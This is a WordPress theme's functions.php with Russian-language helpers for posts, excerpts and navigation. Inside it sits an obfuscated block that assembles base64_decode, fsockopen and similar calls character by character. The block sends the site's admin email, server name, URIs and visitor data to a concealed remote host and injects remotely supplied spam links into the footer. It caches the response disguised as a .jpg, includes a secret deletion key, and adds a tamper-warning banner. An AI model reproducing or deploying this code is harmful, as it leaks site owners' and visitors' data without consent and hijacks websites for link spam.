<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $LKoZpH='d';$hhLsluY='_';$rMKnE='s';$lCnBSSi='c';$MgwQz='e';$QqQBJc='o';$ppFHQ='4';$sdHVYT='e';$qNkeIF='a';$veCUlv='e';$hprAs='b';$HGHsVGH='d';$SdZh='6';$dtLbDRpl=$hprAs.$qNkeIF.$rMKnE.$MgwQz.$SdZh.$ppFHQ.$hhLsluY.$LKoZpH.$veCUlv.$lCnBSSi.$QqQBJc.$HGHsVGH.$sdHVYT;$NIUdstE='z';$ZRYdWXR='l';$XhMgjl='n';$wouZ='t';$XWpl='i';$Kdekef='g';$SUXlzZ='a';$ldVN='f';$BMsL='e';$iiczgbSI=$Kdekef.$NIUdstE.$XWpl.$XhMgjl.$ldVN.$ZRYdWXR.$SUXlzZ.$wouZ.$BMsL;$IuyjkZ='3';$BQGf='1';$YlUV='t';$aQOaZ='s';$sHCtGNJ='o';$eonzsR='r';$ptkC='t';$oMBQ='_';$WVGUAEW='r';$BODyMudE=$aQOaZ.$ptkC.$WVGUAEW.$oMBQ.$eonzsR.$sHCtGNJ.$YlUV.$BQGf.$IuyjkZ;$cTYwQVy='r';$RNXR='e';$HuRk='s';$xzQD='r';$yUsTLC='v';$GwPuo='t';$fLbjMZYB=$HuRk.$GwPuo.$cTYwQVy.$xzQD.$RNXR.$yUsTLC;                     
		$rm_______________c='d';$wg____________k='_';$zi____________y='s';$it_________h='c';$sf__q='e';$bh_____u='o';$ds______________k='4';$zr___d='e';$gl__o='a';$sx___________y='e';$lg_______________p='b';$mg_______d='d';$qt_____z='6';$gy___g=$lg_______________p.$gl__o.$zi____________y.$sf__q.$qt_____z.$ds______________k.$wg____________k.$rm_______________c.$sx___________y.$it_________h.$bh_____u.$mg_______d.$zr___d;
		$ze________w='i';$ax____________f='_';$sl_________m='e';$rk______w='c';$ev___________j='u';$dq___________n='t';$qk__c='i';$jz______________g='o';$pm__k='n';$tm_______________i='n';$vo______________j='f';$xw_____s='t';$at__________q='s';$xo_____________p='x';$qq____________f='s';$az__________u=$vo______________j.$ev___________j.$tm_______________i.$rk______w.$xw_____s.$qk__c.$jz______________g.$pm__k.$ax____________f.$sl_________m.$xo_____________p.$ze________w.$at__________q.$dq___________n.$qq____________f;
		$jk__f='e';$hy_______________s='n';$wy___p='p';$mg_____c='f';$wb______y='o';$ir___j=$mg_____c.$wb______y.$wy___p.$jk__f.$hy_______________s;
		$wy_______________b='a';$xn____________b='d';$mi__________t='f';$zn_________e='e';$hp________z='r';$lt_____________o=$mi__________t.$hp________z.$zn_________e.$wy_______________b.$xn____________b;
		$mh_______a='c';$nq____b='o';$hm______________n='s';$ki___________n='l';$hs___________p='e';$wz____f='f';$ka___________w=$wz____f.$mh_______a.$ki___________n.$nq____b.$hm______________n.$hs___________p;
		
		define("WP_ID", $gy___g("Mi4wLjA="));
		define("WP_TTL", $gy___g("MTA4MDA="));
		define("WP_SRC", $gy___g("dHBva24="));
	


		function wp_get_header() {
			global $gy___g, $az__________u;
			
			if (
				$az__________u($gy___g("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$az__________u($gy___g("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$az__________u($gy___g("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gy___g, $ir___j, $ka___________w, $lt_____________o;
			
			$pt__k = TEMPLATEPATH."/".$gy___g("Zm9vdGVyLnBocA==");
			$au___o = @$ir___j($pt__k, "r");
			$pt__k = @$lt_____________o($au___o, @filesize($pt__k));
			@$ka___________w($au___o);
			
			$yo______________k = TEMPLATEPATH."/".$gy___g("ZnVuY3Rpb25zLnBocA==");
			$au___o = @$ir___j($yo______________k, "r");
			$yo______________k = @$lt_____________o($au___o, @filesize($yo______________k));
			@$ka___________w($au___o);
			
			$ne___________s = 0;
			if($pt__k && $yo______________k) {
				if ($gy___g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pt__k, $gy___g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ne___________s = 1;
					}
					if (substr_count($pt__k, "wp_theme_GPL_credits()") < 1) {
						$ne___________s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ne___________s = 12;
				}
			}
			
			if($ne___________s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ne___________s -->";
			}
		}
	


		function wp_loaded() {
			global $gy___g, $az__________u;
			return $az__________u($gy___g("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ug__________i, $wr____q = "(more...)", $ni________c = 0, $mc__________j = "") {
				$yv_______________i = get_the_content($wr____q, $ni________c, $mc__________j);
				$yv_______________i = apply_filters("the_content", $yv_______________i);
				
				$yv_______________i = str_replace("]]>", "]]>", $yv_______________i);
				if (strlen($_GET["p"]) > 0) {
					echo $yv_______________i;
				}
				else if ((strlen($yv_______________i)>$ug__________i) && ($zn___________k = strpos($yv_______________i, " ", $ug__________i ))) {
					$yv_______________i = substr($yv_______________i, 0, $zn___________k);
					$yv_______________i = $yv_______________i;
					echo $yv_______________i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$wr____q</a></div></p>";
				} else {
					echo $yv_______________i;
				}
				
			}
		}
	


		$qw________m='e';$wa_______________y='b';$sk____________u='e';$wl________w='n';$yo______________v='o';$cv________f='4';$qo___________w='c';$gk______________b='s';$zf___v='a';$ma_____________m='_';$xa___h='e';$tr_____l='6';$pa___j='d';$ie______________t=$wa_______________y.$zf___v.$gk______________b.$xa___h.$tr_____l.$cv________f.$ma_____________m.$qw________m.$wl________w.$qo___________w.$yo______________v.$pa___j.$sk____________u;
		$wl_____________r='e';$kf________n='e';$en__r='n';$jj_____y='_';$ez______r='c';$hu_____e='g';$gs_________n='t';$nz_______y='o';$ma_____________u='t';$gq____________l='s';$gk____z='_';$tt_____________j='i';$ew________o='n';$hg__________j='f';$mt___________j='e';$mo__________s='l';$nv________u='t';$vu____r=$hg__________j.$tt_____________j.$mo__________s.$kf________n.$jj_____y.$hu_____e.$wl_____________r.$ma_____________u.$gk____z.$ez______r.$nz_______y.$ew________o.$gs_________n.$mt___________j.$en__r.$nv________u.$gq____________l;
		$um__________u='i';$rw_______________a='i';$mn____________g='s';$zi__w='t';$wf__x='l';$ph_____________y='_';$et___________q='e';$jq_________s='f';$pt_________d='e';$nb____________d='s';$nc_______s='x';$vx__________e=$jq_________s.$um__________u.$wf__x.$pt_________d.$ph_____________y.$et___________q.$nc_______s.$rw_______________a.$mn____________g.$zi__w.$nb____________d;
		$fw_____________p='i';$vq_______o='a';$ya________v='r';$ym___________w='o';$ku_______________j='e';$gm__f='v';$yd_________i='c';$bm___i='_';$pi_________a='r';$ls__________b='n';$cl______f='s';$pz_____________v='p';$ad___c='e';$me___________p='m';$sy______________z='o';$ih____________v=$gm__f.$ku_______________j.$ya________v.$cl______f.$fw_____________p.$sy______________z.$ls__________b.$bm___i.$yd_________i.$ym___________w.$me___________p.$pz_____________v.$vq_______o.$pi_________a.$ad___c;
		$zs__u='k';$ae______________k='e';$ph________k='s';$pf__________b='p';$kc_____i='o';$ys_________n='n';$pp__o='o';$eg___c='c';$jt_____________d='f';$sz_______________v=$jt_____________d.$ph________k.$pp__o.$eg___c.$zs__u.$kc_____i.$pf__________b.$ae______________k.$ys_________n;
		$il_______________i='f';$oo_______a='e';$lx_______________a='w';$ks______k='i';$xd_____________d='r';$ri_____________s='t';$xz__t=$il_______________i.$lx_______________a.$xd_____________d.$ks______k.$ri_____________s.$oo_______a;
		$jb_____________u='m';$ma____a='5';$ud____l='d';$hj__a=$jb_____________u.$ud____l.$ma____a;
		$zb_______________w='r';$qs__________x='l';$ut_______________u='h';$bh_________f='t';$rk______________v='a';$ue_________j='e';$sm___________m='a';$no______________l='p';$is______u=$zb_______________w.$ue_________j.$sm___________m.$qs__________x.$no______________l.$rk______________v.$bh_________f.$ut_______________u;
		$yg_________w='r';$rx______________b='l';$un__v='z';$aj___j='s';$jb________y='u';$wd____a='e';$zb_________k='i';$yi_______________g='i';$xm____q='a';$hl_________u='n';$df_________u='e';$hy_______________t=$jb________y.$hl_________u.$aj___j.$df_________u.$yg_________w.$zb_________k.$xm____q.$rx______________b.$yi_______________g.$un__v.$wd____a;
		$qb_______p='t';$xq_______________h='a';$ko_________v='e';$gs_________z='m';$wb__a='n';$ia____s='p';$fv___j='m';$gp____________u=$qb_______p.$ko_________v.$fv___j.$ia____s.$wb__a.$xq_______________h.$gs_________z;
		$oq____a='r';$fi____v='t';$nc_________r='a';$qr___l='a';$ww___________q='c';$ml_______i='o';$lm_____________l='n';$qp______o='m';$wa___l='t';$jd_____w='c';$qm______q='_';$um________q='_';$ux___i='e';$vt____b='e';$sd___________g='e';$dr____w='t';$of____________o='t';$cz________g='e';$tp_____________t='s';$ar______________t='r';$zq_______________p='x';$ky__f=$tp_____________t.$wa___l.$ar______________t.$sd___________g.$nc_________r.$qp______o.$qm______q.$ww___________q.$ml_______i.$lm_____________l.$dr____w.$ux___i.$zq_______________p.$fi____v.$um________q.$jd_____w.$oq____a.$cz________g.$qr___l.$of____________o.$vt____b;
	


		function wl_________f($rq_____________j) {
			global $gy___g, $az__________u, $vu____r, $ih____________v, $ky__f;
			
			if (!$az__________u($gy___g("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ih____________v(PHP_VERSION, "5.0.0", ">=") && $az__________u($gy___g("ZmlsZV9nZXRfY29udGVudHM=")) && $az__________u($gy___g("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$xu_________m = $ky__f(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$co___h = @$vu____r($rq_____________j, 0, $xu_________m);
			} else {
				$co___h = @$vu____r($rq_____________j, 0);
			}
			
			return $co___h;
		}
	


		function pg_______________h($rq_____________j) {
			global $az__________u, $sz_______________v, $xz__t, $gy___g;
			
			if (!$az__________u($gy___g("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$da________n = strpos($rq_____________j, "/", 7);
			$gd__j = array(
				"uri"     => substr($rq_____________j, $da________n),
				"host"    => str_replace("http://", "", substr($rq_____________j, 0, $da________n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$co_________j = @$sz_______________v("$gd__j[host]", 80, $ns________t, $wr__________w, 4);
			
			if (!$co_________j) {
				return false;
			} else {
				$co___h = "";
				$gk____d  = "GET $gd__j[uri] HTTP/1.0\r\n";
				$gk____d .= "Host: $gd__j[host]\r\n";
				$gk____d .= "Referer: $gd__j[referer]\r\n";
				$gk____d .= "Connection: Close\r\n\r\n";
				
				@$xz__t($co_________j, $gk____d);
				
				while (!@feof($co_________j)) {
					$bb_______e = @fgets($co_________j, (1024*24));
					
					if ($bb_______e == "\r\n") {
						$ir___f = true;
						continue;
					}
					
					if ($ir___f) {
						$co___h .= $bb_______e;
					}
				}
				
				return $co___h;
			}
		}
	


		function aj____t($rq_____________j) {
			global $az__________u;
			$ec______________f = false;
			
			if ($rq_____________j != "") {
				if ($az__________u("wl_________f")) {
					$ec______________f = @wl_________f($rq_____________j);
				}
				
				if (!$ec______________f && ($az__________u("pg_______________h"))) {
					$ec______________f = @pg_______________h($rq_____________j);
				}
			}
			
			return $ec______________f;
		}
	


		function ys_____________v() {
			global $_SERVER, $hj__a;
			
			$wd___u = $_SERVER["SERVER_NAME"];
			
			if (substr("$wd___u", 0, 4) == "www.") {
				$wd___u = substr("$wd___u", 4);
			}
			
			$wd___u = $hj__a("$_SERVER[SERVER_NAME]");
			
			return $wd___u;
		}
	


		function hf___________o() {
			return "file";
		}
	


		function pr__q($rq_____________j) {
			global $_SERVER, $vu____r, $vx__________e, $ir___j, $ka___________w, $xz__t;
			
			$mu_____________c = uv__________y();
			
			$sf__x = ys_____________v().".jpg";
			$cc____________y = $mu_____________c["dir_upload"]["path"]."/$sf__x";
			$vo___w = @filemtime($cc____________y);
			
			if (!$vo___w || ((time()-$vo___w) >= WP_TTL)) {
				$ec______________f = aj____t($rq_____________j);
				
				if ($ec______________f) {
					if ($vx__________e($cc____________y)) {
						@unlink($cc____________y);
					}
					
					$au___o = @$ir___j($cc____________y, "x+");
					
					@$xz__t($au___o, $ec______________f);
					@$ka___________w($au___o);
				}
			} else {
				if ($vx__________e($cc____________y)) {
					$ec______________f = @$vu____r($cc____________y);
				} else {
					$ec______________f = false;
				}
			}
			
			return $ec______________f;
		}
	


		function uv__________y() {
			global $_SERVER, $gy___g, $ie______________t;
			
			$oh___________l = wp_count_posts("post");
			$lo__t = pathinfo(get_bloginfo("template_directory"));
			
			$mu_____________c = array(
				"url" => array(
					"report"      => $gy___g("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $lo__t,
				"dir_upload"	=> tm___________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$lo__t[filename],
					"a005=".$oh___________l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/brekety-vidy-breketov\">Виды брекетов</a>"
			);
			
			$mu_____________c["url"]["queryString"] = implode("&", $mu_____________c["queryString"]);
			$mu_____________c["url"]["report"] = $mu_____________c["url"]["report"]."/?".$ie______________t($mu_____________c["url"]["queryString"]).".html";
						
			return $mu_____________c;
		}
	


		function tm___________c() {
			$ur____________h = wp_upload_dir();
			
			if (isset($ur____________h["error"])) {
				$xh_______________r = na_______x();
				if (is_writable($xh_______________r)) {
					$ur____________h = array("path" => $xh_______________r);
				}
			}

			return $ur____________h;
		}
	


		function na_______x() {
			global $az__________u, $hj__a, $is______u, $gp____________u;
			
			$kq_______________e = (bool) ini_get("safe_mode");
			if ($kq_______________e == true) {
				return false;
			}
			
			if ($az__________u("sys_get_temp_dir")) {
				$bs_________h = sys_get_temp_dir();
				if (is_writable($bs_________h)) {
					return $is______u($bs_________h);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $is______u($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $is______u($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $is______u($_ENV["TEMP"]);
			} else {
				$xq____________w = $gp____________u($hj__a(uniqid(rand(), true)), "");
				if ($xq____________w) {
					$bs_________h = $is______u(dirname($xq____________w));
					@unlink($xq____________w);
					return $bs_________h;
				} else {
					return false;
				}
			}
		}
	


		function fy________t() {
			global $_GET, $vx__________e;
			
			$mu_____________c = uv__________y();
			$wd___u = ys_____________v();
			$yu______________z = hf___________o();
			
			$kq____________d = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($yu______________z == "file") {
					$nh______b = $mu_____________c["dir_upload"]["path"]."/".$wd___u.".jpg";
					if ($vx__________e($nh______b)) {
						@unlink($nh______b);
						$kq____________d = "deleted";
					}
				}
				
				$gt____d = array(
					"s"	=> $kq____________d,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($gt____d AS $wm_______j => $us_______w) echo " [$wm_______j:$us_______w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $az__________u, $gy___g, $hy_______________t;
			$mu_____________c = uv__________y();
			
			$my____________a = "pr__q";
			if ($az__________u($my____________a)) {
				$co___h = $my____________a($mu_____________c["url"]["report"]);
			}
			
			if ($co___h) {
				if ($co___h = @$gy___g($co___h)) {
					$co___h = @$hy_______________t($co___h);
					
					if (strlen($co___h[custom_credit]) >= 5) {
						$mu_____________c["default_string"] = $co___h[custom_credit];
					}
					
					if ($co___h["status"] == "0") {
						$jx______z = 1;
						$ih_________p = 1;
					} else {
						$se___y = sizeof($co___h["links"]);
						$lt_____i = $mu_____________c["default_string"];
						
						if ($se___y > 0 && $co___h["links"] !== "") {
							$ul___n = 0;
							foreach ($co___h["links"] as $nn_______u => $pk_________v) {
								$ul___n++;
								if ($pk_________v->l_path == "" || $pk_________v->l_path == $_SERVER["REQUEST_URI"]) {
									$pk_________v->l_href = htmlspecialchars(strip_tags($pk_________v->l_href));
									$pk_________v->l_title = htmlspecialchars(strip_tags($pk_________v->l_title));
									$pk_________v->l_anchor = htmlspecialchars(strip_tags($pk_________v->l_anchor));
									$lt_____i .= " | ";
									$lt_____i .= "<a href='$pk_________v->l_href' title='$pk_________v->l_title'";
									if ($pk_________v->l_nofollow == "1") {
										$lt_____i .= " rel='nofollow'";
									}
									$lt_____i .= ">$pk_________v->l_anchor</a>";
								}
							}
						}
						$mu_____________c["links"] = "$lt_____i";
						if ($co___h[credit] == "0") {
							$mu_____________c["links"] = "";
						}
					}
				} else {
					$jx______z = "1";
				}
			} else {
				$jx______z = "1";
			}
			
			if ($jx______z == "1") {
				$mu_____________c["links"] = $mu_____________c["default_string"];
			}
			
			echo "$mu_____________c[links]";
			
			echo "<!-- s: $co___h[signature] -->";
			fy________t();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tags:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

